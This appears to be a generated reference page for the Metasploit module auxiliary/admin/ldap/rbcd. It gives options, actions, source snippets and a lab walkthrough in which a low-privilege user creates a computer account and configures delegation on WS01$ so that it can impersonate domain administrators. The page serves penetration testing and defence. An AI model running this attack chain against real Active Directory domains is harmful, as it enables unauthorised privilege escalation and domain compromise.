Role Base Constrained Delegation - Metasploit
This page contains detailed information about how to use the auxiliary/admin/ldap/rbcd metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Role Base Constrained Delegation
Module: auxiliary/admin/ldap/rbcd
Source code: modules/auxiliary/admin/ldap/rbcd.rb
Disclosure date: -
Last modification time: 2022-11-14 12:27:38 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 389
List of CVEs: -
This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/ldap/rbcd
msf auxiliary(rbcd) > show targets
... a list of targets ...
msf auxiliary(rbcd) > set TARGET target-id
msf auxiliary(rbcd) > show options
... show and set options ...
msf auxiliary(rbcd) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
DELEGATE_TO: The delegation target
Knowledge Base
Vulnerable Application
This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO).
Verification Steps
- Set the
RHOST
value to a target domain controller - Set the
BIND_DN
andBIND_PW
information to an account with the necessary privileges - Set the
DELEGATE_TO
andDELEGATE_FROM
data store options - Use the
WRITE
action to configure the target for RBCD
Actions
FLUSH
Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just the matching ACEs.
READ
Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD.
REMOVE
Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs instead of deleting the entire security descriptor.
WRITE
Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists.
Options
DELEGATE_TO
The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated user must have write access to this object.
DELEGATE_FROM
The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE) the delegation target.
Scenarios
Window Server 2019 Domain Controller
In the following example the user MSFLAB\sandy
has write access to the computer account WS01$
. The sandy account is
used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
The new computer account can then impersonate any user, including domain administrators, on WS01$
by authenticating
with the Service for User (S4U) Kerberos extension.
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
COMPUTER_PASSWORD no The password for the new computer
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
SMBUser => sandy
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 192.168.159.10
[*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
[+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
[+] 192.168.159.10:445 - Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
[+] 192.168.159.10:445 - SID: S-1-5-21-3402587289-1488798532-3618296993-1655
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN [email protected]
BIND_DN => [email protected]
msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
BIND_PW => Password1!
msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
DELEGATE_TO => WS01$
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
DELEGATE_FROM => DESKTOP-QLSTR9NW$
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] Allowed accounts:
[*] DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) >
Go back to menu.
Msfconsole Usage
Here is how the admin/ldap/rbcd auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/ldap/rbcd) > show info
Name: Role Base Constrained Delegation
Module: auxiliary/admin/ldap/rbcd
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Podalirius
Charlie Bromberg
Spencer McIntyre
Module side effects:
config-changes
Available actions:
Name Description
---- -----------
FLUSH Delete the security descriptor
READ Read the security descriptor
REMOVE Remove matching ACEs from the security descriptor DACL
WRITE Add an ACE to the security descriptor DACL
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
DELEGATE_FROM no The delegation source
DELEGATE_TO yes The delegation target
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
Description:
This module can read and write the necessary LDAP attributes to
configure a particular object for Role Based Constrained Delegation
(RBCD). When writing, the module will add an access control entry to
allow the account specified in DELEGATE_FROM to the object specified
in DELEGATE_TO. In order for this to succeed, the authenticated user
must have write access to the target object (the object specified in
DELEGATE_TO).
References:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py
Module Options
This is a complete list of options available in the admin/ldap/rbcd auxiliary module:
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
DELEGATE_FROM no The delegation source
DELEGATE_TO yes The delegation target
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
Auxiliary action:
Name Description
---- -----------
READ Read the security descriptor
Advanced Options
Here is a complete list of advanced options supported by the admin/ldap/rbcd auxiliary module:
msf6 auxiliary(admin/ldap/rbcd) > show advanced
Module advanced options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
LDAP::ConnectTimeout 10.0 yes Timeout for LDAP connect
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/ldap/rbcd module can do:
msf6 auxiliary(admin/ldap/rbcd) > show actions
Auxiliary actions:
Name Description
---- -----------
FLUSH Delete the security descriptor
READ Read the security descriptor
REMOVE Remove matching ACEs from the security descriptor DACL
WRITE Add an ACE to the security descriptor DACL
Evasion Options
Here is the full list of possible evasion options supported by the admin/ldap/rbcd auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/ldap/rbcd) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- An LDAP operational error occurred. The error was: <VALUE>
- The LDAP operation failed because the referenced attribute does not exist.
- The LDAP operation failed due to insufficient access rights.
- The LDAP operation failed because the server is too busy to perform the request.
- The LDAP operation failed because the server is not currently available to process the request.
- The LDAP operation failed because the server is unwilling to perform the request.
- The LDAP operation failed due to a naming violation.
- The LDAP operation failed due to an object class violation.
- Unknown LDAP error occurred: result: <VALUE> message: <VALUE>
- The DELEGATE_FROM option must be specified for this action.
- Failed to find sAMAccountName: <DELEGATE_FROM>
- Couldn't discover base DN!
- Failed to find sAMAccountName: <DELEGATE_TO>
- No DACL ACEs are present. No changes are necessary.
- No DACL ACEs matched. No changes are necessary.
- Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.
- Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
An LDAP operational error occurred. The error was: <VALUE>
Here is a relevant code snippet related to the "An LDAP operational error occurred. The error was: <VALUE>" error message:
67:
68: print_error(message)
69: # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
70: case ldap_result['resultCode']
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
The LDAP operation failed because the referenced attribute does not exist.
Here is a relevant code snippet related to the "The LDAP operation failed because the referenced attribute does not exist." error message:
69: # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
70: case ldap_result['resultCode']
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
The LDAP operation failed due to insufficient access rights.
Here is a relevant code snippet related to the "The LDAP operation failed due to insufficient access rights." error message:
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
The LDAP operation failed because the server is too busy to perform the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is too busy to perform the request." error message:
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
The LDAP operation failed because the server is not currently available to process the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is not currently available to process the request." error message:
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
The LDAP operation failed because the server is unwilling to perform the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is unwilling to perform the request." error message:
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
The LDAP operation failed due to a naming violation.
Here is a relevant code snippet related to the "The LDAP operation failed due to a naming violation." error message:
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
The LDAP operation failed due to an object class violation.
Here is a relevant code snippet related to the "The LDAP operation failed due to an object class violation." error message:
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
90: end
91:
Unknown LDAP error occurred: result: <VALUE> message: <VALUE>
Here is a relevant code snippet related to the "Unknown LDAP error occurred: result: <VALUE> message: <VALUE>" error message:
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
90: end
91:
92: def get_delegate_from_obj
93: delegate_from = datastore['DELEGATE_FROM']
94: if delegate_from.blank?
The DELEGATE_FROM option must be specified for this action.
Here is a relevant code snippet related to the "The DELEGATE_FROM option must be specified for this action." error message:
90: end
91:
92: def get_delegate_from_obj
93: delegate_from = datastore['DELEGATE_FROM']
94: if delegate_from.blank?
95: fail_with(Failure::BadConfig, 'The DELEGATE_FROM option must be specified for this action.')
96: end
97:
98: obj = ldap_get("(sAMAccountName=#{delegate_from})", attributes: ['sAMAccountName', 'ObjectSID'])
99: if obj.nil? && !delegate_from.end_with?('$')
100: obj = ldap_get("(sAMAccountName=#{delegate_from}$)", attributes: ['sAMAccountName', 'ObjectSID'])
Failed to find sAMAccountName: <DELEGATE_FROM>
Here is a relevant code snippet related to the "Failed to find sAMAccountName: <DELEGATE_FROM>" error message:
97:
98: obj = ldap_get("(sAMAccountName=#{delegate_from})", attributes: ['sAMAccountName', 'ObjectSID'])
99: if obj.nil? && !delegate_from.end_with?('$')
100: obj = ldap_get("(sAMAccountName=#{delegate_from}$)", attributes: ['sAMAccountName', 'ObjectSID'])
101: end
102: fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_from}") unless obj
103:
104: obj
105: end
106:
107: def ldap_get(filter, attributes: [])
Couldn't discover base DN!
Here is a relevant code snippet related to the "Couldn't discover base DN!" error message:
134: print_status("User-specified base DN: #{@base_dn}")
135: else
136: print_status('Discovering base DN automatically')
137:
138: unless (@base_dn = discover_base_dn(ldap))
139: print_warning("Couldn't discover base DN!")
140: end
141: end
142: @ldap = ldap
143:
144: delegate_to = datastore['DELEGATE_TO']
Failed to find sAMAccountName: <DELEGATE_TO>
Here is a relevant code snippet related to the "Failed to find sAMAccountName: <DELEGATE_TO>" error message:
144: delegate_to = datastore['DELEGATE_TO']
145: obj = ldap_get("(sAMAccountName=#{delegate_to})", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE])
146: if obj.nil? && !delegate_to.end_with?('$')
147: obj = ldap_get("(sAMAccountName=#{delegate_to}$)", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE])
148: end
149: fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_to}") unless obj
150:
151: send("action_#{action.name.downcase}", obj)
152: end
153: rescue Net::LDAP::Error => e
154: print_error("#{e.class}: #{e.message}")
No DACL ACEs are present. No changes are necessary.
Here is a relevant code snippet related to the "No DACL ACEs are present. No changes are necessary." error message:
180: def action_remove(obj)
181: delegate_from = get_delegate_from_obj
182:
183: security_descriptor = obj[ATTRIBUTE]
184: unless security_descriptor.dacl && !security_descriptor.dacl.aces.empty?
185: print_status('No DACL ACEs are present. No changes are necessary.')
186: return
187: end
188:
189: aces = security_descriptor.dacl.aces.snapshot
190: aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] }
No DACL ACEs matched. No changes are necessary.
Here is a relevant code snippet related to the "No DACL ACEs matched. No changes are necessary." error message:
188:
189: aces = security_descriptor.dacl.aces.snapshot
190: aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] }
191: delta = security_descriptor.dacl.aces.length - aces.length
192: if delta == 0
193: print_status('No DACL ACEs matched. No changes are necessary.')
194: return
195: else
196: print_status("Removed #{delta} matching ACE#{delta > 1 ? 's' : ''}.")
197: end
198: security_descriptor.dacl.aces = aces
Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
199: # clear these fields so they'll be calculated automatically after the update
200: security_descriptor.dacl.acl_count.clear
201: security_descriptor.dacl.acl_size.clear
202:
203: unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
204: fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
205: end
206: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
207: end
208:
209: def action_flush(obj)
The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.
Here is a relevant code snippet related to the "The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary." error message:
206: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
207: end
208:
209: def action_flush(obj)
210: unless obj[ATTRIBUTE]
211: print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.')
212: return
213: end
214:
215: unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
216: fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
211: print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.')
212: return
213: end
214:
215: unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
216: fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
217: end
218:
219: print_good('Successfully deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
220: end
221:
Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
234: security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
235: security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
236: security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
237:
238: unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
239: fail_with_ldap_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
240: end
241:
242: print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
243: print_status('Added account:')
244: print_status(" #{delegate_from['ObjectSid']} (#{delegate_from['sAMAccountName']})")
Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
260: end
261:
262: security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
263:
264: unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
265: fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
266: end
267:
268: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
269: end
270: end
Go back to menu.
Related Pull Requests
References
- CVE: Not available
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
- https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py
See Also
Check also the following modules related to this module:
- auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
- exploit/windows/ldap/imail_thc
- exploit/windows/ldap/pgp_keyserver7
- auxiliary/dos/wireshark/cldap
- auxiliary/dos/wireshark/ldap
- auxiliary/gather/ldap_esc_vulnerable_cert_finder
- auxiliary/gather/ldap_hashdump
- auxiliary/gather/ldap_query
- auxiliary/gather/vmware_vcenter_vmdir_ldap
- auxiliary/gather/xerox_workcentre_5xxx_ldap
- auxiliary/scanner/http/symantec_brightmail_ldapcreds
- auxiliary/server/ldap
- exploit/linux/http/pineapp_ldapsyncnow_exec
- exploit/linux/misc/jenkins_ldap_deserialize
- exploit/multi/http/phpldapadmin_query_engine
- exploit/windows/http/apache_mod_rewrite_ldap
Authors
- Podalirius
- Charlie Bromberg
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.